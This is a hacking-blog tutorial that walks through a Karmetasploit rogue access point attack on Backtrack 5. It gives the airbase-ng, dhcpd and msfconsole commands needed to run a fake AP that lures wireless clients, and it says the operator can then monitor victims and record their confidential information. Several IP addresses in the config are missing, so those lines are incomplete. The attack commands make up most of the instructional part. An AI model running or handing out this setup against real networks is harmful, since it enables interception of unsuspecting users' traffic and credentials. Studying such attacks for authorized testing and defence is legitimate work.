Karmetasploit- Backtrack 5 Tutorial

Wireless communication is now become a need of networking, radio signals are unseen but they carry your information on the form of bits by using different modulation techniques. However security is very important for wireless network because it is more vulnerable. As discussed before about wireless security and rogue access point, in this article i will try to cover Karmetasploit.

Metasploit is now one of the best tool for penetration testing and the word Karmetasploit has driven from two words one is KARMA (KARMA Attacks Radioed Machines Automatically) and the other is Metasploit.  

So what is Karmetasploit? 

KARMA is a wireless client attack toolkit and the integration of Karma and metasploit is called Karmetasploit, in 2004 Dino A. Dai Zovi and Shane A. Macaulay did a presentation called “All your layer are belong to us” in that presentation they have described the insecurity of wireless access point and introduced the tool KARMA. This tool acts as wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.
The above passage gives the basic introduction of KARMA and about Metasploit your can learn from here.
Karmetasploit Tutorial

If you are not using backtrack 5 than you must have to install some dependencies like Aircrack-ng 
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install 
# airmon-ng start [wifi-interface]
For backtrack like backtrack5 follow the procedure
[email protected]:/pentest/exploits/framework3# wget http://www.offensive-security.com/downloads/karma.rc
Now here is the need to configure DHCP server so that the Fake AP connect with the network.

[email protected]:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;


log-facility local7;

subnet netmask {
  option routers;
  option domain-name-servers;

[email protected]:~# gem install activerecord sqlite3-ruby

By we approx done now the time to restart the wireless interface and start listening.

[email protected]:~# airmon-ng
[email protected]:~# airmon-ng stop ath0
[email protected]:~# airmon-ng start wifi0
[email protected]:~# airbase-ng -P -C 30 -e “U R PWND” -v ath1

What this commands do? These command is used to create a new interface that is rogue interface or fake AP, now we have to assign IP address and DHCP configuration so the interface work properly.

[email protected]:~# ifconfig at0 up netmask[email protected]:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0[email protected]:~# ps aux | grep dhcpd

Karmetasploit Attack Vector 
After configuration you are ready to run karmetasploit and start an attack 
[email protected]:~# cd /pentest/exploits/framework3/
[email protected]:/pentest/exploits/framework3# msfconsole -r karma.rc 
The command will start metasploit and than Karma script start to act as a fake AP and it will give you the command like this 

msf auxiliary(http) >

When the victim will start using this AP you are free to monitor all the activities and you can record of the confidential information.

msf auxiliary(http) >
[*] DNS XID 87 (IN::A www.google.com)

This is little advance tutorial and if you dont understand it than it means you have to understand rogue access point first.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Security Against Hacks: A Simple Game of Economics

One of the cold hard truths behind cybersecurity is that it's impossible to prevent a hack 100% of the time. It only takes one...

Certain Things That You Must Know About Microsoft MS-500 Exam and Its Practice Tests

If you want to be a Microsoft 365 security administrator, then there would be a number of responsibilities that will fall on your shoulders,...

Quick Ways to Avoid Being Watched by the NSA’s PRISM Program

Big brother is on the watch online. Today, a week hardly passes without news of government spying, whistleblowers, cell phone hacking, or even private photos...

Android Post Exploitation: Exploit ADB using Ghost Framework in Kali Linux

This article is the part of Android Hacking tutorial; it covers step by step guide to exploit Android ADB to get the persistent connection...


Then sign up for FREE to the ehacking’s exclusive group. You will get the exclusive tips/tricks, tutorials, webinars & courses that I ONLY share with my fellow on this exclusive newsletter.